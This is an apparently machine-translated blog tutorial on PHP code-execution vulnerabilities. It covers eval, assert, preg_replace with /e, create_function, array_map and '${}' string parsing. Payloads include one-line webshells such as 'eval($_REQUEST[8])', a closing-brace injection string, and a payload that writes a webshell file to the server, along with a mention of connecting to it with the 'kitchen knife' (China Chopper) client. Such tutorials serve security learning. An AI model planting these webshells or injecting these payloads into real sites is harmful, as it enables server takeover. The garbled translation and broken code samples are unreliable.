The first part : Code execution & Basic principle of command execution

Code Execution Vulnerability （RCE： Remote command or code execution ）

principle ： Data entered by the user , Is executed as back-end code

Code execution ： Data entered by the user , Is executed as back-end code

Command execution ： Data entered by the user , Is executed by the system

stay php There are many code execution functions in

for example

<php  eval（$_request[8]);?>  //eval Take the string as PHP Code execution .     Can be executed in multiple lines
<php  assert（$_request[8]);?> //assert Treat the passed in parameters as PHP Code . Only single line execution is allowed
How to use assert Function to execute multiple lines ？

answer ：assert function Only single line execution is allowed , however eval You can do multiple lines

We can call eval function , Is this a single line execution ！
For example, the back-end code is ：<php  assert（$_request[8]);?>

We can do it in URL Column write ：127.0.0.1/1.php?8=eval ('echo 123;phpinfo';）

（2） Writing documents , Write all the code you need to execute into the file , Multiple lines can be written in the file

File_put_contents('123.php','<php echo 123;phpinfo();?>');

file_put_contents function // Write a string to a file

This means take 123 and phpinfo Write to 123.php In the document

3.preg_replace function  // Regular substitution

preg_replace ('/a/','b','aabbwe') Here is the a Replace with b The output shows bbbbwe

Then someone will say What's the use of this ？

There's really nothing wrong with it , What caused the problem was his modifier

In regular expressions , There are many modifiers, right , And there is a modifier /e

/e At the heart of ： The second parameter entered by the user is executed as code

such as ：preg_replace ('/a/e','phpinfo','aabbwe')

The second parameter here It will be executed as code

What if you can control the regular expression rules of the target website ？ Is it dangerous

Be careful ： If there is no... In the required matching replacement a, Then he will not carry out an execution （ image preg_replace ('/a/e','phpinfo','bbbbwe') 

4.create_function  // Anonymous functions Custom functions

create_function( The first parameter is a formal parameter , The second parameter is the executable code );

This function For some small partners whose code is not very good It's very difficult to understand

Let me give you an example

Anonymous functions are simply ： It is a function created by the user , But it is a function without a name
create_function() This function means to create an anonymous function
You just need to understand that the parameters in it are functions , The first parameter is the formal parameter , That means you call this function , Then pass him the parameters
For example, in this case , I created an anonymous function
$a = create_function('$id','echo $id');   And then this $a It represents the anonymous function （ It can be understood as function name ）, And then call $a Pass him a parameter 8  $a(8); And then this 8 The variable will be given as a parameter $id, And then we did echo $id

$a It is equivalent to a function
Let's call $a
$a(8)
Passed a parameter to this function 8
$id = 8
And then go ahead echo $id;
Just output 8
Then we'll replace Change to

$a = create_function('$id',$_REQUEST[8]);

$a(10)

The principle is the same If we can control You can take shell

At this time, someone will say If $a（10） There is no? Unable to call ？

We can type in 1.php？8=}phpinfo（）;//

} Will be in front of him { Make a close

// I'll comment out the following }

In the end phpinfo（）;

Can be connected with a kitchen knife

5.array_map // Callback function , Call a function

for instance

function // Define a function Definition cube($n)

return // A content returned after the function is executed Put the executed things into （$n*$n*$n）

Also said $a=[1,2,3,4,5]; Will put it in （$n*$n*$n）

1x1x1=1

2x2x2=8

3x3x3=27

You know what I mean

It's obvious here array_map The role of the He will put the functions into the array in turn to perform an execution

Let's change to array_map($_REQUEST[1],$_REQUEST);

call_user_func() Callbacks are also possible , The callback function is PHP There's a lot of

There are also many functions （ You can baidu yourself ）

6. Special combination ( Double quotation mark secondary parsing )

[PHP edition 5.5 And above versions can use ]

stay PHP It is also described in the official documents of https://www.php.net/manual/zh/language.types.string.php

"${phpinfo()}";  => Code execution phpinfo()

It means to be $ and { When they are close together Will be executed as code

${phpinfo()};

In addition, you can use file_put_contents This function Everyone who writes documents has learned

"${file_put_contents('16.php','<?php eval($_REQUEST[8])?>')}";

Use this function to write a sentence to 16.php Right No problem

And then visit 16.php？8=phpinfo();( You know what I mean )

Link to the original text ：https://blog.csdn.net/weixin_50446974/article/details/117201357